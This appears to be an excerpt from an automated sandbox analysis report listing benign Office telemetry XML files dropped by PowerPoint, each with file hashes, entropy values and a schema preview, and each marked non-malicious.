                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):644
                                                                                                                              Entropy (8bit):5.218650687808662
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdbjX9LPQjP5iUvAQ2Cer4SfUIdLWtlZQIdy99UXNO2su:2dbT9LPoiUm1r4NkHk39
                                                                                                                              MD5:9C97AAFE180DA2E59CFA4AD9574BADB8
                                                                                                                              SHA1:82443054CBAEEE052B9DB899B2827E40DF7B04DD
                                                                                                                              SHA-256:184F910F87F410FA119971CFDD758937ED4ECD016F082A43542EFED4F4CA707A
                                                                                                                              SHA-512:920000FA2DFB1882197CF2B27FCD8EF6E46AF997709BF36FB41FF2197B9FC3FE6418C114F2D4E9A605BD8C3F7913551916CA8C6A6A7CC6457C2944FF07C3DC3F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490003" V="7" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.TriggerMet" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" T="Upload-Medium" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bl59l" A="c2gyk c2g8c dciyv" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):758
                                                                                                                              Entropy (8bit):5.232302719741035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdKj4PQjP5iUvAQjer5O2ikl9IqI6bdSFYfI5NlFfUIdLWtiOZQIp9WtvMfZvM:2dKkPoiU6r53l2qI3iQbliknvM5M
                                                                                                                              MD5:A923073D09A336D7E9B2BA6D6CFA3DA4
                                                                                                                              SHA1:C602E0E8C118C84BC9BA9DEF0C96EC06AD70161F
                                                                                                                              SHA-256:7790F9DD9EFFDDDF86D0A2B397E8CFC5CED9F99932FBFD6A0B74A67A953F8C15
                                                                                                                              SHA-512:3CEC63578F57773DFA4720A6A6E55FCFCD75471494C603B16597002F836F0D9CDA5CF3400BEA082E1D3CF5DEB72F638297490711E28116EA4FF81018A675FC5C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490004" V="7" DC="SM" EN="Office.Feedback.Survey.UI.Win32" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bl9xx" A="bl9xo bl9xq bl9xp bl9xn bp405 b14tn b14td b14tf b14te b14tk b14ta b14tb clmf2 4ogdw 4ogc3 4ogc1 4ogcz 4ogcy 4ogcx 4ogcs 4ogcp 4n2e3 4n2e1 4n2e2 4n2e4 4n2ei 4n2ef" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyID">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="SurveyType">.. <S T="1" F="SurveyType" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):694
                                                                                                                              Entropy (8bit):5.132471131375387
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdW1OjXPQjP5iUvAQjerFfUIdLWtiOZQIdy99UXdVUS/rwNO2su:2dYOzPoiU6riknk3tds
                                                                                                                              MD5:57643FFB80D8EE40EBE2C5BE91E6B235
                                                                                                                              SHA1:09FDCDFB991946255CDE5AB3E46A92D10ABB4244
                                                                                                                              SHA-256:EE5E9A161271F4197C8041E7FA2B71A9B2415B44EC6183FCEBC2D87E8303EC59
                                                                                                                              SHA-512:14942C2BFAD7849E3B757ACDC620BF2DA481C3C2B373EC52E82889763CCB2A1BBD20741579AA6C70A114F17BC4C7BAF7A9A577B78A9FBEC169D91283AF4B9A2B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490005" V="3" DC="SM" EN="Office.Feedback.Survey.UI.Win32.Toast" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bn5lz" A="bn5l3 bn5l4" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyID">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="Reason">.. <S T="1" F="Reason" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1119
                                                                                                                              Entropy (8bit):4.858429693642566
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrjX9zx6PQjP5iAGervHrOcer6Werm5NXahIUfedLm/6Wdy9yN7PNWSf/0//+:2drT9zsPoiAZrvHrkrwrmBi1tPfcPt0
                                                                                                                              MD5:2491ED1BF43648BE1AC8590E853F2563
                                                                                                                              SHA1:83A35326F23D9B9B2A87E05AFC4DE517FDF9F28E
                                                                                                                              SHA-256:24F90B5868CBF64BC183E1415AC1AB87C3415FC032E48CCD0C68D1BC2B8F726D
                                                                                                                              SHA-512:09796320C85043DA1BEB4BB0B73D7C92984E2FD2D18761A3826F1D6C17B0AC589FDA224184B59091E569D64D806961583DAF0B4D2237D1F8050418ED2666DA10
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490009" V="5" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.Errors" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bl595" A="bl6ab c2g3y c2g37 c2hdl c2hdu" />.. <UTS T="2" Id="b55pw" A="c2gwy c2g6s" />.. <UTS T="3" Id="b7zln" A="c2gwo c2g6i" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="4" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="JsonException">.. <S T="4" F="Json_exception" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="JsonString">.. <O T="COALESCE">.. <L>.. <S T="1" F="JsonString" M="Ignore" />.. </L>.. <R>.. <O T="COALESCE">.. <L>.. <S T="2" F="channelStateAsJson" M="Ignore" />.. </L>.. <R>.. <S T="3" F="campaignStatesAs
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1054
                                                                                                                              Entropy (8bit):4.999452903396452
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dLT9b7PoiUm1rbmu++agGik3CD81gGJAl:cPhoidfmuH58gGJAl
                                                                                                                              MD5:7BE3F9AE585F48137DDB83D194599484
                                                                                                                              SHA1:571EBE7102CF4EBBA055F3D435F1C3C076BBAA53
                                                                                                                              SHA-256:5160189915677719B6116DE6E71D175075601A02CE46DF1693331BF326AFD257
                                                                                                                              SHA-512:70D30C2E5B2436470BBE14CC28CDEC416DAFA58C5C0AC3F66AF8B1645084BF2E1230462E7CE6A9BC3D67190CDA8AA57AC6E4AE64099503695F4F77506668B0EA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490010" V="7" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.SurveyTracked" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" T="Upload-Medium" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b9q72" A="c2gya c2g72 dciyl" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="GovernedChannelType" />.. </L>.. <R>.. <V V="2" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="2" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="2" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="2" F="UniqueId" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="GovernedChannelType">.. <S T="2" F="GovernedChannelType" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="PrimaryPriority">.. <S T="2" F="PrimaryPriority" M="Igno
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):522
                                                                                                                              Entropy (8bit):5.396572860245193
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQ2jX913PQjP5iUvAQ2GerWlT4pJ8AoMfUINO2su:2dQ2T913PoiUmZrgT4pWN/g
                                                                                                                              MD5:A90F6A229417292BE4FB76D0DBAB8926
                                                                                                                              SHA1:F7A0C85AA1631E53C5416F050707F4A16515DD69
                                                                                                                              SHA-256:0AE8F35547FF32F491B050F47D82E9BC13E51DF790BD033E5517D2F485A48D3E
                                                                                                                              SHA-512:0AB23048DFA72450068FBAA20D1A9D570968B4F903363DE07944287372A24245E794DA13FD4283884258DC3E4EF53702244980EBEE705A8FD971345F20BF19EE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490011" V="4" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.ForcedCooldown" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ck0tl" A="ck0to ck0tq csffj c2gv0 c2gxw c2g5v c2g7o c2gyn c2g8f dcizh dciw6 dcixz" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):750
                                                                                                                              Entropy (8bit):5.1660163564825154
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9ajX9DuPQjP5i8IerTgLfUIdLHABnt9ytFpKatmansyAuUpKaAuDaNO2su:2d9aT9DuPoi8vrcwkrKb5KYa
                                                                                                                              MD5:3BF5A212D8030694B90DD243467D6FE7
                                                                                                                              SHA1:1EECDCD53F5A9CC455F633B29F9CEF7492FA39BA
                                                                                                                              SHA-256:9982FA668AE03EA082322A5DCF882E28DD9A61B010CAD2D7DB20F172740C75D6
                                                                                                                              SHA-512:2D461FCBC004D7A73FE27A62434FC915013BEE5694B6E51A1A07CD2F99E296F45733FD538F32DEBD0003B142C52625CAF0F031DD2162E13B80A70A2F1A421B1B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490014" V="2" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.FeatureFlags" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ctrxf" A="ctrxh ctrxe ctrxg 6ulqq" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="AppName">.. <S T="1" F="AppName" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="FloodgateClientLibletEnabled">.. <S T="1" F="FloodgateClientLibletEnabled" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="FloodgateEnabled">.. <S T="1" F="FloodgateEnabled" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):590
                                                                                                                              Entropy (8bit):5.170559833928803
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnzTjX9TPQjP5i8IerYxfUIdLWtlZQIdy99UXNO2su:2dzTT9TPoi8vrY+kHk39
                                                                                                                              MD5:9A75E1B8B62949C176A23EF658E5A1A6
                                                                                                                              SHA1:772DA6458281E3AF84695B079F798F7927AE7EB0
                                                                                                                              SHA-256:8058D0F89507BC610110BF1C83D8E3CC95240708C055377A1154C21EAAE304D5
                                                                                                                              SHA-512:9E526CC6955A8A2AC90EB4FE61DA1AB6684283EB4261C6228248FB680CE4404A15DB6BBE86ABA4916A8710D80439F642DF1CBD2047CC1DDC6DA0668F9F133EC3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490015" V="2" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.RoamingRefresh" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cvj3a" A="cvj29" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):756
                                                                                                                              Entropy (8bit):5.203214093629336
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnz1OjX9TPQjP5iAGerR86vfUIdLumDtODXdy9WtlZQIdV9UXNO2su:2dz1OT9TPoiAZrRwkymDgDt8kY9
                                                                                                                              MD5:93BF56E09A99D9289CFC56FF88218AD7
                                                                                                                              SHA1:ABA58E97387177C6F6FEFAF3F09EC8712304D98D
                                                                                                                              SHA-256:BA054EE3D08D3F8DB7939369AF5DE50378BBC92BF3B0C4A562BC11D763982BDA
                                                                                                                              SHA-512:359FF52E3DBCD50E7B77A1FD81B28366F26041B24A23298404B5C77EDA9AC912E677AA7109D19ABD72A151B60E6AC33AAF1B5491920430E83F39C1936B231E57
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490015" V="3" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.RoamingRefresh" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cvj3b" A="cvj3a cvj29 c2gyu c2gyj c2gyi c2g8m c2g8b c2g8a" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="OpenChannelTypes">.. <S T="1" F="OpenChannelTypes" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):756
                                                                                                                              Entropy (8bit):5.201955000402187
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnz42jX9TPQjP5iAGerR86vfUIdLumDtODXdy9WtlZQIdV9UXNO2su:2dz42T9TPoiAZrRwkymDgDt8kY9
                                                                                                                              MD5:1A64923B01DA080FBEA52A7814BA6750
                                                                                                                              SHA1:2C693FFAB0F78D6E9FF1837427C24A5DB6700A7D
                                                                                                                              SHA-256:177C1A3F4A3921EB096BCADD6D2F2E3895AB3323037E1D6E015E366826B69D40
                                                                                                                              SHA-512:B6850996F6DCE40E96279707287C6EA9CD460B038EAA87B06344B26DFA37BF6F78516BC239B25F8340F8C3DAEAFAAB1BB4149DC03786990DD874E81EB559F4BC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490015" V="4" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.RoamingRefresh" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cvj3b" A="cvj3a cvj29 c2gyu c2gyj c2gyi c2g8m c2g8b c2g8a" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="OpenChannelTypes">.. <S T="1" F="OpenChannelTypes" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):774
                                                                                                                              Entropy (8bit):5.216653685662024
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnzOjX9TPQjP5iAGerR86WwfUIdLumDtODXdy9WtlZQIdV9UXNO2su:2dzOT9TPoiAZrRijkymDgDt8kY9
                                                                                                                              MD5:42D2F8042E0F16BFB890A47DAEDFFFFB
                                                                                                                              SHA1:BCF22598DF77C376466B22C07D01B63E500F4F13
                                                                                                                              SHA-256:62205A5F2F9BD6CE98C883CFD9FD5386C8848811659D1D8A15CFDBE3A672EADA
                                                                                                                              SHA-512:B1CAD1A6EC6D1DE14AA80F8771E55976E555DAD0E5F080128228800FA6806AC9E726070E6C5654B1D16B8C9E67423A47DC3A3BFDA4C48F0E3004924D3BC9CC06
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490015" V="5" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.RoamingRefresh" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cvj3b" A="cvj3a cvj29 c2gyu c2gyj c2gyi c2g8m c2g8b c2g8a dcizo dciyu dciyt" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="OpenChannelTypes">.. <S T="1" F="OpenChannelTypes" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):776
                                                                                                                              Entropy (8bit):5.269995983314768
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdIOjX9K2OsPQjP5iAGerwEi2MaGxX0Y/hjfUIZTOXHnt9Jg+oZNO2su:2dIOT9SsPoiAZrwUMjX04I9joP
                                                                                                                              MD5:8CEED689BB687358926991903E7789E8
                                                                                                                              SHA1:32EAC2BFCCE452A3A52DEBE56398B6C1960B50B2
                                                                                                                              SHA-256:8209248CA79CDD94C96D191810EA21D4589C5D84AB9F04DA3FC1677BEDD4084C
                                                                                                                              SHA-512:C562B9BE958DDC7E9ECB8BB5D39BEF05251F4E0909B901B361A96B4F48697CFD6DA31CC2EBAE3DCEEED46C9A7E6F686C44E36EDA7A32B94F6B6AF628D5CACB29
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490016" V="3" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.RoamingSuccessfulReadWrite" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cvw3m" A="cvw38 cvw3t cvw3g cvw32 cvw3w cvw3q cvw4d cvw3v c2g0w c2g1w c2g1b c2g02 c2g13 c2g1h c2g01 c2g12 c2g1g c2hal c2hbl c2ha0 c2har c2hbs c2ha6 c2haq c2hbr c2ha5" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U64" I="1" O="true" N="Count">.. <S T="1" F="count" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="AnonymousUser">.. <S T="1" F="anonymousUser" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):600
                                                                                                                              Entropy (8bit):5.313452430415608
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdY7OjX9OXjCRPQjP5iUvAQXerQHFjQ8GfUIa3Cfm2NO2su:2dGOT9OXGRPoiU+r2jd3CuG
                                                                                                                              MD5:CDC3A978642C30851A5A42D8D0285881
                                                                                                                              SHA1:0657EE05D352465B6DF55A54333868BEDDE6DFBD
                                                                                                                              SHA-256:3E9A27CF7744D2D19D38AA6DC4AE2DF4C7221D5DDF8E6550D39B48736F46238A
                                                                                                                              SHA-512:F1A392A347FD03104714766A103A9E683FA9A05307A256E23B05A81A5329F2769368017EBA7A7AAF9C8A4F7E57E669FA470516EE1233C1F136625120157BDF37
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490018" V="3" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.RegisterGovernanceProvider" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="csffr" A="csffs c2g0e c2g0f c2g96 c2g97 dcizx dcizy" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U32" I="1" O="true" N="GovernedChannelType">.. <S T="1" F="GovernedChannelType" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):792
                                                                                                                              Entropy (8bit):5.1585853149422425
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdFOjX9PMBPQjP5i8IerPwGb1/cACbAjfUIdLWtlAGnp9l/+b4RCffE2NO2su:2dFOT9UPoi8vr3btcbdkK1FCnEG
                                                                                                                              MD5:2096D6903035F26A0E39296573AFF472
                                                                                                                              SHA1:81A8ABE47BCF91B0065C532DE2969DE8A2D95656
                                                                                                                              SHA-256:D63051D59777806876F9DF5A04E9803400E5BD1CFD59FDC62F63F5D7E29ACB3C
                                                                                                                              SHA-512:BCE6E5B8035FB697D78D28C672DD464FD94716719C5AF80A64BC8950720F48254A3E637C68D5A61829C5D29B154C5519B34C59E9E5D966CC05385B47C1AA4FB1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490020" V="3" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.GetDecisionForAction" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c4cim" A="c4ciq c4cir c4ci1 c4ci2 c4cik c4cil dcizv dcizw dciyf dciy5 dciy6 dciyd dciye dedlj dedlk dedll dek9z" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="ActionId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Decision">.. <S T="1" F="Decision" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="ChannelType">.. <S T="1" F="ChannelType" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):909
                                                                                                                              Entropy (8bit):5.0162899219761075
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdTgjC5PQjP5iEereB6w5GfUIdLWtlZQIdy99UXnsSrF/LaoaxKf7PNWzcuf/3:2dMIPoiLreP5hkHk3D5ugzPscKv
                                                                                                                              MD5:898083A0B7D94221F1F80627996A95E1
                                                                                                                              SHA1:BCE486A49A5C7F5FD3E0C65E8A3F3B653653A344
                                                                                                                              SHA-256:470A3C0DAB926791E80C33E960F51768A6E89D9EDEDD704563C5B4256C29817D
                                                                                                                              SHA-512:4C0B9190490001583BD131761F40770C4BE77F09175668E66D23CF30B49CD5B9976A99E8342DDC7AA157A19E17060500F72E3738E1C81EDD88AA3600A4E2F9F8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490023" V="0" DC="SM" EN="Office.Feedback.Survey.TeachingCallout" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="dbtq1" A="dbtq2 dbs37 dbs38" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="CalloutShown">.. <S T="1" F="CalloutShown" M="Ignore" />.. </C>.. <C T="U8" I="4" O="true" N="DismissalType">.. <O T="COALESCE">.. <L>.. <S T="1" F="DismissType" M="Ignore" />.. </L>.. <R>.. <S T="1" F="DismissalType" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):537
                                                                                                                              Entropy (8bit):5.227600293961609
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdpjX9wbUPPQjP5iAGer0hAfUIZyOTxfpKaOTLNO2su:2dpT9wwPPoiAZr0FENBKBd
                                                                                                                              MD5:7F136FB538B26F39FA65DC1EBCE20417
                                                                                                                              SHA1:0B47E74F0705AF4247F2E77A5CEA7DF7C5F6B926
                                                                                                                              SHA-256:45DDF603194824AC9CA2BE42A5A99A494137235636DB1C99754491870A72F116
                                                                                                                              SHA-512:53747C15E166D2908028C3A06819635F67DDA5C55E8E42DA994F95477B9EC2E5BE1BFAC0FACAB1519F6008C1C307052EA7C9D59ABCEE2804B5FA35961AF25FA9
